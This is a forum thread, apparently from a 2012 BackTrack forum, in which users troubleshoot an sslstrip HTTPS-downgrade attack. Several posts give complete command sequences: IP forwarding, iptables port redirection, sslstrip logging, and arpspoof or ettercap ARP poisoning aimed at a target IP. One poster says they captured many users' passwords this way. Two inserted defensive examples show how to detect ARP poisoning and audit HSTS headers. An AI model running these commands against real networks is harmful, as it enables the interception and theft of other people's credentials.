
Thread: I need help with sslstrip, seems to only be partially working

  1. #1
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    3


    Hi Peeps, I'm new here (first post) and I'm posting in hope that someone may be of assistance.

    I'm currently trying to use sslstrip.

    I'm using BackTrack 5 R2, on a 32-bit system.

    I've tried following several tutorials and of all I've tried, none have seemed to work, or they do but in a limited fashion.

    I'm using the following commands

    echo "1" > /proc/sys/net/ipv4/ip_forward

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

    sslstrip -a -l 10000 -w secret.log

    and in a new terminal window.

    arpspoof -i wlan0 -t 192.168.1.101 192.168.1.1

    When I perform the first part, in the first terminal window, I get the following: sslstrip 0.9 by Moxie Marlinspike running...


    and in the arpspoof terminal window, it presents me with what I believe is the output I should be expecting, based on what I've seen in the tutorials.

    When I try to access pages on my target device, it appears to do the redirects that it should be doing, and the connection is slower than it would be under normal conditions (as expected).

    However, when I try to access the secret.log file, it's completely empty!

    I've also tried another tutorial which is similar to the above, but which utilises ettercap too, but that doesn't appear to do anything for me either, but I'll get to that another time.

    Could someone please offer some help or guidance as to what exactly the problem may be?

    Any and all help, muchly appreciated, Thanks

  2. #2
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    5


    I have practiced this attack on my LAN, but I use ettercap with IP Tables still commented out so that SSL Strip can do the work. I have not used ARP Spoof to do the spoofing, so I can't tell you if that is causing your issue. What I can tell you is that when I use ettercap, the output when a PC on my LAN gets "attacked" shows up in the ettercap output window. I suggest giving this a try over arpspoof. I ran the ettercap GTK just because I am familiar with the setup to start ARP spoofing, and I can throw in some DNS spoofing if necessary, but you can of course run it from the command line just as quickly as arpspoof. Another way you can tell if it is just the logging that is screwed up is by looking at the site in the browser bar; it will make HTTPS sites HTTP on the initial presentation of the page.

    The only issue that I have run into with this attack is that it does not always grab the credentials. For example, I will go to a few sites: Facebook, PayPal, eBay. Then I try it a second time and it might miss PayPal, for instance. Haven't nailed down why this happens. Hope you can get something out of this.

    Ech3l0n

  3. #3
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    2


    Strict Transport Security

    Here's some good info on it:
    http://tools.ietf.org/html/draft-iet...ansport-sec-09

  4. #4
    Very good friend of the forum maverik35's Avatar
    Join Date
    Sep 2009
    Location
    Debian land
    Posts
    734


    I had a bad experience using all kinds of things and I was never able to even ARP poison again. I used ettercap + sslstrip, sslstrip + arpspoof, and was never able to get any password anymore. There is some script by comaX, but it did not work either.

    I used to audit LANs with ettercap + sslstrip, and man, I caught many, many users and passwords; I documented them all. One day it just stopped working for no apparent reason. Why? I do not know. This is my very own personal experience; the scenarios are pretty much the same in my case, trying to audit some LANs, different routers.

    I'm now trying other techniques and still reading, but somehow, and again in my case, it stopped working... Still looking for a reason. I'm using Wireshark to analyze traffic over port 80, TCP, etc.

    Try this hoping it can help you:

    1. You need to modify etter.conf (nano /etc/etter.conf). Go down to the "Linux" section and uncomment the lines under "if you use iptables": "#redir_command_on =" and "#redir_command_off =". They should look like this: "redir_command_on =" and "redir_command_off ="
    2. Make sure the first section, [privs], has the following:
    ec_uid = 0
    ec_gid = 0
    3. Open a terminal and type: iptables -t nat --flush and then type: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    4. Then type: sslstrip --ssl --favicon --write "the name of your file with path" (you can use letters instead of whole words: --ssl = -s, --write = -w; it is a matter of taste)
    5. Open a second terminal and run: ettercap -Tqi "your iface" -M arp:remote /ip, ip range or all ip's/ /gateway ip/ -P autoadd

    The use of "ettercap -Tqi wlan0" (it sets the forwarding on the interface i, and uses Text mode in Quiet mode = Tqi).
    The use of -M arp:remote enables the MITM: ARP spoofing, and remote means 2-way poisoning, in this case of what is between the 2 pairs of slashes (// //).

    The use of -P means you are going to use a plugin. Which one? "autoadd": this means any PC connected after the ettercap execution will be added to the database along with the others already poisoned. And this will happen to any client connected to the LAN after the ettercap execution. Great plugin...

    All this is in the ettercap manual (type man ettercap and read it).

    Try it and see what happens...

    Luck.
    Last edited by maverik35; 06-12-2012 at 10:38 AM.
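
Added example, not part of the original thread: seen from the defender's side, the two-way ARP poisoning described in post #4 shows up in a host's neighbour table as the gateway's MAC address changing and two IPs sharing one MAC. The snapshots, the MAC addresses and the 192.168.1.23 host below are constructed; the input format is that of `ip neigh show`.

```python
import re

# One `ip neigh show` row: "<ip> dev <iface> lladdr <mac> [router] <STATE>"
NEIGH_RE = re.compile(r"^(\S+) dev \S+ lladdr ([0-9A-Fa-f:]{17})\b")

def parse_neigh(text):
    """Map IP -> MAC; rows without lladdr (FAILED/INCOMPLETE) are skipped."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table

def detect(baseline, current, gateway):
    """Compare a known-good snapshot with the current one; return alert tuples."""
    alerts = []
    old, new = baseline.get(gateway), current.get(gateway)
    if old and new and old != new:
        alerts.append(("gateway-mac-changed", gateway, old, new))
    by_mac = {}
    for ip, mac in current.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:  # can be legitimate (multi-homed host, proxy ARP): review
            alerts.append(("mac-shared", mac, tuple(sorted(ips))))
    return alerts

# Constructed snapshots, not captured from a real network.
BASELINE = """
192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.101 dev wlan0 lladdr 66:77:88:99:aa:bb STALE
192.168.1.23 dev wlan0 lladdr de:ad:be:ef:00:01 STALE
"""
POISONED = """
192.168.1.1 dev wlan0 lladdr de:ad:be:ef:00:01 REACHABLE
192.168.1.101 dev wlan0 lladdr 66:77:88:99:aa:bb STALE
192.168.1.23 dev wlan0 lladdr DE:AD:BE:EF:00:01 REACHABLE
192.168.1.50 dev wlan0  FAILED
"""

if __name__ == "__main__":
    for alert in detect(parse_neigh(BASELINE), parse_neigh(POISONED), "192.168.1.1"):
        print(alert)
```

A static ARP entry for the gateway on the client, or Dynamic ARP Inspection on the switch, prevents the first alert from ever firing.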

  5. #5
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    2


    Like I said, your issue is most likely caused by websites enforcing Strict Transport Security. Try different websites/browsers to see if that's the issue.

    But in general, when I'm lost while trying to figure something out, I go back to basics, at a conceptual level.

    So what are we trying to do? We want to intercept a stream of data sent in packets from a target machine and redirect it to another service to analyse it. What is the data we want? Where does it come from? Where is it going? What do we want to do with it? A graphical schema helps.

    on the attacker's machine:
    is eth/wlan0 monitoring?
    which services/ports are used?
    is the traffic pre-routed correctly?
    is the service/port where traffic is pre-routed to up&running?
    what is expected of that service?
    tools like ifconfig, nmap, iptables, wireshark, etc. can help here.

    on the victim's machine:
    which website is it trying to reach?
    what are the security measures of that website?
    which services/ports are used to establish connection?
    which agent/browser is being used?
    what are the security rules enabled on that browser?

    HTH
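
Added example, not part of the original thread: posts #3 and #5 point to Strict Transport Security as the reason the HTTP downgrade stops working. This sketch parses the header the way a browser does under RFC 6797 and reports weaknesses in a site's policy; the sample responses and the 180-day threshold are assumptions made for the example.

```python
import re

MIN_MAX_AGE = 15552000  # 180 days; audit threshold assumed for this example

def parse_hsts(value):
    """Parse a Strict-Transport-Security value; None means a browser ignores it."""
    directives = {}
    for part in value.split(";"):
        name, _, val = part.strip().partition("=")
        name = name.strip().lower()
        if not name:
            continue
        if name in directives:  # a repeated directive invalidates the header
            return None
        directives[name] = val.strip().strip('"')
    if not re.fullmatch(r"\d+", directives.get("max-age", "")):
        return None  # max-age is mandatory and must be a non-negative integer
    return {"max_age": int(directives["max-age"]),
            "include_subdomains": "includesubdomains" in directives,
            "preload": "preload" in directives}

def audit(scheme, headers):
    """Findings for one response; an empty list means the policy looks sound."""
    raw = next((v for k, v in headers if k.lower() == "strict-transport-security"), None)
    if raw is None:
        return ["no HSTS header: every http:// visit can be downgraded"]
    if scheme != "https":
        return ["HSTS header sent over http is ignored by browsers"]
    policy = parse_hsts(raw)
    if policy is None:
        return ["malformed HSTS header is ignored by browsers"]
    findings = []
    if policy["max_age"] == 0:
        findings.append("max-age=0 deletes the stored policy")
    elif policy["max_age"] < MIN_MAX_AGE:
        findings.append("max-age shorter than 180 days")
    if not policy["include_subdomains"]:
        findings.append("subdomains are not covered")
    return findings

SAMPLES = [  # constructed responses, not captured traffic
    ("https", [("Strict-Transport-Security", "max-age=31536000; includeSubDomains; preload")]),
    ("https", [("strict-transport-security", "max-age=300")]),
    ("http", [("Strict-Transport-Security", "max-age=31536000")]),
    ("https", [("Content-Type", "text/html")]),
]
if __name__ == "__main__":
    for scheme, hdrs in SAMPLES:
        print(scheme, audit(scheme, hdrs))
```

Even a sound policy only protects a browser that has already seen it once over HTTPS, unless the host is on the browser's preload list, which is why results differ between sites and browsers.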

  6. #6
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    3


    Thanks guys

    Maverik, I tried what you suggested, I had already modified the etter.conf file as you described, I double checked it just now when I followed your suggestion.

    Unfortunately, I'm getting more or less the same results as before, the log file still isn't being logged to, it's in a directory with the correct permissions and everything!

    I still find it odd. The target device is being re-directed to http pages, instead of https as it should be so either there is no listening occurring (?) or there's some kind of error preventing the log from being written to, or at least that's my thinking currently.

    I'm working through the ettercap man file, it's pretty comprehensive, I'll continue to look through it

    Is there another way to achieve what I'm trying, without using ettercap? I don't think ettercap is the cause of the problem, I may be wrong here but it's just puzzling and I'd like to try every possible way before giving up.

    Is it possible it's a hardware issue? Or is this a bug?

  7. #7
    Just burned their ISO
    Join Date
    Sep 2011
    Location
    Matrix
    Posts
    18


    Hello,

    Seems like the problem is old. I know this issue; I had the same a few months ago.

    After looking here and there I found out that this issue has been there since BT5/BT5R1 (don't know it right now). -> Seems like it still works on BT4 and and and...

    I will search out the old topics and will post it here =)

  8. #8
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    3


    Quote: Originally Posted by bambuka
        Hello,

        Seems like the problem is old. I know this issue; I had the same a few months ago.

        After looking here and there I found out that this issue has been there since BT5/BT5R1 (don't know it right now). -> Seems like it still works on BT4 and and and...

        I will search out the old topics and will post it here =)

    I've heard in many places that bt4 just seems to work when bt5 doesn't, however I've obtained an iso for bt4 and for some reason it just won't install on this machine, and instead keeps kicking up issues about being unable to mount, I'm wondering if maybe I have too many partitions on this machine, but when I try installing on another machine with only one installation of ubuntu I have exactly the same problem.

    Also though, on this machine, the one with bt5 already installed, I tried booting the bt5 iso and I get the exact same problem that's happening with bt4, which is odd, considering that's the exact same method I used to install it on here, though I didn't have as many partitions installed when I installed bt5 initially, I'm wondering about how to properly remove partitions, I've tried using gparted before and resulted in removing the grub (or something along those lines) and so I had to do a reinstall of ubuntu to restore the netbook to full working order, which resulted in me being back to square one with regards to how many partitions I had installed and with currently no way of solving that problem, annoyingly, anyone offer any tips on this problem?

    thanks!

  9. #9
    Just burned their ISO
    Join Date
    Mar 2012
    Posts
    16


    cd /pentest/web/sslstrip

    echo '1' > /proc/sys/net/ipv4/ip_forward

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

    arpspoof -i wlan0 192.168.0.1

    python sslstrip.py -l 8080

    tail -f sslstrip.log

    This is how I would do it.
    Then everything would display in the tail shell.
